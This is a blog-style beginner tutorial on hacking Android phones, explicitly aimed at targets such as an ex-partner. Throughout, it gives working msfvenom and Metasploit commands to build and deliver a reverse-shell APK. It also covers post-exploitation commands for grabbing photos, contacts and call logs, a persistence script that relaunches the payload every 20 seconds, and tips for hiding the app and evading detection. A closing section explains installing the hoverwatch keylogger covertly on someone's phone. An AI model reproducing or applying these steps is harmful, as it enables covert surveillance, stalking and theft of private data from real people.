How to Hack an Android phone: Beginner guide to Advance

Do you want to learn android pen testing or just want to hack your ex-phone? I will explain everything from scratch. You did not need any previous knowledge for this.

Just read this post carefully with patience.

After reading this post, you can hack any android phone (but don’t expect any magic from me).

I will post 2-3 on Android hacking

You will learn

• How to hack android using Linux os
• Hack using any device.
• Hack by window operating system

If you are a beginner then read these article before reading this article. Otherwise, you will not properly understand this article.

Kali Linux tutorials for beginners

How to use Metasploit

Stupid Question like ‘How to hack an android phone,’ ‘what is this,’ ‘My gf/bf cheating me please help me’ is not allowed 

Using the Linux operating system.

I am assuming you have read kali Linux tutorials for beginners. In Kali Linux, there is tool known as Metasploit

What is Metasploit

Metasploit is the framework where all type of pen testing tool is present. You can hack anything like window pc, server, android, etc. If you are beginner check out the Metasploit tutorial for beginners.

Practical 😀

Note: I’m using same wifi network. In the end, I will show you How to hack the device that is not on your network?. Keep reading.

First of all, we create a payload (you can call it app) then install it on his/her phone. When your victim opens it you his device will be in your control.

Here is the command to run in the terminal

msfvenom -p android/meterpreter/reverse_tcp LPORT=your local IP LPORT=4444 -o appname.apk

This command will create an app in the current directory with the name of appname. Off course you can change it to anything. Let me explain this

-p for payload. I have reverse_tcp because it bypasses all kind of firewall rules.

LHOST: Is your local IP address. Type ifconfig to find your IP address. Make sure your target mobile phone is using the same network. Later on, I will tell you how to hack android phones that are outside of your network.

LPORT: for selecting the port number. I have chosen 4444 because it is free. You can choose anyone but in the particular case, I will recommend you to chose 443. It is the port number for https. So in any case expert it scanning phone he/she will ignore this because it is the port for https (it should open). If he/she see port 4444 is open, then he can check the phone.

o For saving app, you can use > too. It will keep apk in the current directory.

After that in terminal type msfconsole. It will launch Metasploit.

Set your exploit to multi handler. here is the command

use exploit/multi/handler

(if you are confused by this command to read Metasploit tutorial for a beginner )

Now we need to set the payload

set payload android/meterpreter/reverse_tcp

Show options command will show all the options. As you can see in the screenshot, we need to set LHOST (mean local IP address)

set LHOST 192.168.43.60

This is my IP your IP different than this. I show you above how to find the local Ip address

Port number should be same as msfvenom. Mine is 443

set  LPORT 443

Last command

type

run

Your system is ready for hacking the android phone.

App that you created in the first step install it in your phone (for testing)

open it (you will get nothing)

But on the computer side, you got the meterpreter session. Mean you have hacked this device :).

In my case, I don’t know why I am facing this error

Don’t worry run this command

session -i

It will show output similar to like it. Because I open the app three times so I got 3 sessions.

In my case I got 3 sessions I don’t not in your case but we will select the last sessions. Command

sessions -i 3

You got meterpreter sessions 😎

type help to see what can you do.

You can do anything like taking screenshots, call details, keylogger, upload and download files, etc.

These are a lot commands here are some samples

 

• To take photo
• webcam_snap
• To export all contacts
• dump_contacts
• For call logs
• dump_calllog
• You can hide app too
• hide_app_icon

You can download or upload files too if you know Linux commands

Moral: you can do anything.

How to send to apk file to Victim

If you send file this. He/She will definitely uninstall it because it shows nothing. You hide the app icon using hide_app_icon command.

App open again and again automatically

But if user clean recent apps then our connection will be lhost.

To bypass this problem follow these steps.

Open any text editor and copy paste these codes.

#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

save it with startagain.sh

Make sure extension is .sh

When you got meterpreter session then  run these commands

cd /sdcard/Download

upload startagain.sh

You will like this on uploading script

This means you have uploaded script successfully. Run these commands to execute script.

shell

cd /sdcard/Download

sh startagain.sh

after 5-10 seconds press ctrl+c like the screenshot

Don’t worry we stop shell not script.

As you can see in the screenshot I got New meterpreter sessions after every 20 seconds.

Until you will not reboot your phone you will continuously get meterpreter sessions after every 20 seconds.

How to hack the device that is not in your network?

You can port forward your router then use your public IP address (search on google my public IP). In the case, if you are using mobile data then buy a web server.

How to get web server free?

Google cloud provide you free web server with the amount of $300. You can use this money to install Linux distribution (I think Debian coast $10/month). Install Kali Linux and do the same process just change IP to your public IP (Google will provide you).

Make sure you have the credit card for making billing.

Hack Using any device

For this, we will use a unique app known as keylogger apps. It will record everything typed by victim keyboard and send to you. There are many keylogger apps available for Android, But I will use hoverwatch.

This app is not available in Google play store. You have to download from official site. This is best free spy software from all tested apps.
Just Install and receive log files online. There is the only one limitation in this app that it will give you free trial version up to 3 days. Therefore, you can use hoverwatch free for only three days. Paid Plans are starting from $8.33/month for a single device.
There is the only one limitation in this app that it will give you free trial version up to 3 days only mean you can use this app free for just three days. Plans are starting from $8.33/month for a single device.
How to enable hoverwatch

1. Open hoverwatch official site, type your email and password and click on “Sign up Free” Button.
2. It will take you to https://i.hoverwatch.com/app/index.html#add-device URLyou can see a Download button click on it [make sure it is under android tab as shown in the screenshot]
3. After downloading Install it in which phone you want to install. Don’t ask in comments how to install an app.
4. After Installing it, open the app. When you open this app, it will ask you about I am going to use this software to monitor. I recommend you to choosing my device and make sure Hide Hoverwatch Icon and click on the Ok button
5. on next page agree With Legal Terms tap on I ACCEPT button then It will ask for “Activate device administrator” click on Activate button
   
6. On next page, it will ask your email & password  so enter email and password that you made in the first step
7. Done now you are ready you can view logs on hoverwatch website. Sign in your account and you can see all recorded keystroke.

By window 10 operating system

You can install Metasploit in the window Os too. Click here to Install all tools including Metasploit. This is the best easy way to hack the android phone.

I have published send part of android Hacking. Install apps without touching phone.